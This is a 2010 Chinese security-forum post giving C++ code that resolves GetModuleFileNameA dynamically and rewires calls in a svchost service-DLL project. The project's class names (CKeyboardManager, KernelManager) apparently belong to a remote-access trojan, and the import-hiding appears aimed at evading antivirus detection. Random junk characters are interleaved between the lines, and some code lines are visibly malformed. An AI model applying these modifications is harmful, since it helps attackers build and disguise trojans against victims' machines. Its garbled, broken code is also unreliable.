标题:
[原创文章]
全局动态调用
[打印本页]
作者:
ice_xke
时间:
2010-10-19 12:30
标题:
全局动态调用
全局动态调用笔记
6 L/ O$ G" ]( h F z5 ~
svchost files工程->插入->类(Generic Class DTDY)->DTDY.cpp DTDY.h
6 c1 X. @ Z: u k
----------------------------------------
' M0 n8 Y/ b. ]
DTDY.h:
% \9 Z8 D1 u- _/ P
8 o/ q, @+ U/ E7 z
#if _MSC_VER>1000
5 B5 y: U* k" @1 q* E
#pragma once
0 a, [9 x- M9 Q
#endif //_MSC_VER>1000
' W- C2 e, _; j/ c* R0 _
#include<windows.h>
, K( W6 w( B- a- d- b! b6 c
* V0 R( D k3 `/ w$ n+ \/ d
typedef DWORD (__stdcall *pGetModuleFileNameA)(HMODULE,LPSTR,DWORD);
4 ~. B! k' j) q7 c; M
class DTDY
9 C# H6 |2 y6 E3 H0 @
{
1 _8 t2 Z7 w7 B; V, f
public:
. P2 F p5 \( n7 }6 k
DTDY();
5 p/ r/ m2 ^) p" i8 u
virtual ~DTDY();
) j# E1 W4 @. [* V
public:
7 U. r# [7 `4 L2 O0 O( @
static pGetModuleFileNameA MyGetModuleFileName;
) C9 z4 I3 ~4 n) t
static BOOL FunInitiallization();
. N' V* n8 D# a) l$ A
};
1 d6 f& e9 _, Q* v* i5 _
#endif
8 r* l: [- \2 \' n
----------------------------------------
Y. o) Z0 o0 A8 K8 k- |
' C ~- ^- \3 d5 d
DTDY.cpp:
3 ]% Q" y& G4 K* O2 [3 j- p
$ f4 y, R. v* i1 K0 c
#include "DTDY.h"
; `' V9 V+ g9 y
pGetModuleFileNameA DTDY::MyGetModuleFileName=NULL;
T; X/ G# u4 z6 v `2 j- M
DTDY:TDY()
& G8 y+ d! Q% y: x# a
{
3 t4 W/ X4 h u& A# B# `( _; G
}
& Q# V8 \2 F, X) G H7 ]
DTDY::~DTDY()
* d* _+ i" b. z7 h
{
1 D* k0 F* d7 } m1 B
}
% A0 v+ S# x" M) t% J
BOOL DTDY::FunInitiallization()
2 g$ ]$ e4 }: E, i# L
{
& [1 {4 |& o" B# }
HMODULE hModule=LoadLibrary("kernel32.dll");
2 [: M$ q6 r( u
MyGetModuleFileName=(pGetModuleFileNameA)GetProcAddress(hModule,"GetModuleFileNameA");
6 S; t2 T! O+ r
if(!MyGetModuleFileName=) return FALSE;
' L- b& S' }: z5 D7 R# J3 e
# t. A7 {8 d9 A- U( s5 _) S
return TRUE;
2 ` `4 x3 y* z4 l, ?2 _0 R; R
}
+ t/ X# \: u; `" H, [4 o
----------------------------------------
' p# L& l+ J2 V5 {6 V. p% w' P1 |
svchost.cpp:
6 J: s: z/ {! C: Y+ R9 Y& K
- u J1 _& ?! e0 V. ?
#include "DTDY.h"
% b# |5 r# f: |4 n- A/ d
' Q+ x. L m3 x: a" c# F+ _
BOOL APIENTRY DllMain(HANDLE hModule,DWORD ul_reason_for_call,LPVOID lpReserved)
+ U' i, E3 E/ ]0 t- C- P( x
{
7 X1 j: w( z) v7 a. x1 `) H
switch(ul_reason_for_call)
5 o* D* j! U. y
{
/ o, e2 {, {* x) T
case DLL_PROCESS_ATTACH:
- e0 b( a, m# J/ k( q0 Y5 s
if(!DTDY::FunInitiallization()) return FALSE;
/ @, j/ f" s+ q3 { _% o
' g% j, m) C! \ O, ?4 F2 l7 M* D; l
break;
. A4 E& \9 Y& b
}
& p6 k$ i& X7 |6 c
}
( W) r6 s% H n1 _" ~$ l! R, R( V
1 J9 `/ z1 R% ]+ J
3 q7 ~+ v- ^8 u- W: G1 A
GetModuleFileName(CKeyboardManager::g_hInstance,strFileName,sizeof(strFileName));->goto def
) ]9 Q9 L7 s) e3 L. I
改写为
" A$ O# ^0 V( B" L! q3 p/ f
DTDY::MyGetModuleFileName(CKeyboardManager::g_hInstance,strFileName,sizeof(strFileName));
5 b# C' P8 ^- _7 c9 b) ?$ L
----------------------------------------
2 F5 L' x8 n5 w/ P7 o( N2 l
KernelManager.cpp:
8 a+ o* c- G+ c* ^( {* R% t
7 D+ a! n* s7 h
#include "../DTDY.h"
0 L( ^4 t4 V9 [% F# R, r
GetModuleFileName(CKeyboardManager::g_hInstance,strServiceDll,sizeof(strServiceDll));
0 X! Y2 Q* P3 o. z+ x
改写为
/ h9 E- G6 L2 t' {* b; _
DTDY::MyGetModuleFileName(CKeyboardManager::g_hInstance,strServiceDll,sizeof(strServiceDll));
. Q# l, M( k6 ]6 p0 T, W
----------------------------------------
欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com/)
Powered by Discuz! 7.2
